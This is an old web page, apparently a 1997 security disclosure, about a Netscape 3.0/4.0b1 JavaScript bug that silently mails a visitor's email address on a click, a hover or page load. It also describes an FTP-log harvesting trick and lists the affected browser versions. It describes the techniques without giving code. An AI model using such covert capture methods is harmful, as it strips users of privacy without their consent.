bang!

Keep those cards and letters coming!

Completely safe link - trust me!

Since you have arrived at this page, you may have already touched a button like the one above that causes an email message to be sent, revealing your email address without your consent (if you are using version 3.0 or 4.0b1 of Netscape). The button can say absolutely anything on it, and you would only find out when it is too late, by watching the status bar at the bottom of the browser.

In fact, I could have snarfed your email address from this page, without you having to press a button or move your mouse. For an example of this, click here. In addition, I could trigger the browser to send mail when you pass your mouse over a link. For example, if you pass your mouse over the "Competely safe" link above, then it will send mail (watch the status bar at the bottom). Other examples can be found here (uses an invisible link in a frame) and here (uses a blue line).

These exploits use a javascript bug in Netscape Navigator versions 3.0 and 4.0b1. Note: this is a security problem in Netscape Javascript - not java. This bug seems to work in some version of the code if:

In addition, there is a setting for security of submitted forms by email that is by default set on. This setting can be changed by the user (a bad choice), but is inoperable against the kind of script used on this page under versions 3.0 and 4.0b1. This is not the same bug that existed in Netscape 2.0 and was fixed in version 2.02. At that time, Netscape wrote in their release notes:
A user's email addresses could have been inadvertently exposed to individuals without the user knowing it, compromising the user's privacy. Netscape Navigator 2.02 solves this privacy problem by limiting JavaScript's ability to automatically post mail or news from form elements. This ensures that user interaction is required to send mail or post news messages.
HUH? Strictly speaking, you do have to push a button, move your mouse over a link, or load a page. On the other hand, there is no evidence that this action will cause email to be sent. I guess the hits just keep on coming...

Even if you have Javascript turned off, there are still ways to capture your email address. For example, a page can use the META reload HTML feature to take the user to an ftp URL (perhaps in a hidden frame). There is a setting to turn off transmitting your email address as the password, but many people have it set. By monitoring the log files of an ftp server, you can capture email addresses. You can can find other exploits in the DigiCrime home page.

Your only protection against these attempts to gather email addresses are to turn off javascript capabilities in your browser. You don't need dancing bears anyway. Perhaps someday in the future these bundled packages will pay more attention to security and privacy rather than glitz and convenience. Competition sometimes has a way of bringing out the worst in software. Netscape has still not responded to my submission of a bug report, and they have apparently discontinued the bugs bounty program.

Note: as of June 1997, this bug has been patched for quite a while, but from the logs it appears that approximately 20% of the people that visit this page still have their email address captured. Too many old browsers I guess...

DISCLAIMER: Unlike the spammers of the world, I don't collect these email addresses. I simply count how many people send us mail. After that RISKS note, I am now getting about a megabyte a day of unintentional mail. If you are thinking of using this trick in your own pages, remember that doing so is immoral.

This page has produced mail from the following versions of Netscape. I have not tested whether it is triggered automatically or results from pushing the button (both are bad), and whether it gives a warning to the user before submitting the form.

2.0 (X11; I; SunOS 5.5 sun4u) 2.01DT [de] (Win16; I)
2.02 (X11; I; IRIX64 6.2 IP21) 3.0 (Macintosh; I; 68K)
3.0 (Macintosh; I; PPC) 3.0 (Win16; I)
3.0 (Win95; I) 3.0 (Win95; I; 16bit)
3.0 (Win95; U) 3.0 (WinNT; I)
3.0 (X11; I; AIX 1) 3.0 (X11; I; FreeBSD 2.1.0-RELEASE i386)
3.0 (X11; I; HP-UX A.09.05 9000/712) 3.0 (X11; I; HP-UX A.09.05 9000/715)
3.0 (X11; I; Linux 2.0.18 i586) 3.0 (X11; I; Linux 2.0.20 i586)
3.0 (X11; I; Linux 2.1.15 i586) 3.0 (X11; I; Linux 1.3.98 i586)
3.0 (X11; U; SunOS 4.1.3 sun4c) 3.0 (X11; U; SunOS 5.5 sun4m)
3.0 (X11; I; SunOS 5.4 sun4m) 3.0 (X11; I; SunOS 5.5 sun4m)
3.0 (X11; I; SunOS 5.5.1 sun4m) 3.0 (X11; U; SunOS 4.1.3 sun4c)
3.0 (X11; U; SunOS 5.5 sun4m) 3.0C-NC320 (Win16; I)
3.0C-PBWG (Win95; U) 3.0Gold (Macintosh; I; PPC)
3.0Gold (Win16; I) 3.0Gold (Win16; U)
3.0Gold (Win95; I) 3.0Gold (Win95; U)
3.0Gold (WinNT; I) 3.0Gold (X11; I; SunOS 5.3 sun4d)
3.0Gold (X11; I; SunOS 5.4 sun4m) 3.0Gold (X11; I; OSF1 V3.2 alpha)
3.01 (Macintosh; I; PPC) 3.01 (Win16; I)
3.01 (Win95; I) 3.01 (Win95; U)
3.01 (WinNT; I) 3.01 (X11; I; Linux 2.0.18 i586)
3.01 (X11; I; Linux 2.0.27 i586) 3.01 (X11; I; SunOS 5.5.1 i86pc)
3.01 (X11; I; SunOS 5.5.1 sun4m) 3.01Gold (Win16; I)
3.01Gold (Win95; I) 3.01Gold (Win95; U)
3.01Gold (X11; I; SunOS 5.5.1 sun4m) 3.01Gold (WinNT; I)
4.0b1 (Win95; I) 4.0b1 (WinNT; I)
4.0b4 [en] (Win95; I) 4.0 [en] (Win95; I)
4.01 [en] (Win95; I) 4.01 [en] (WinNT; I)

Have a nice day - free of privacy.

infected image - do no load

DigiCrime is comicly hosted by Southwest Cyberport.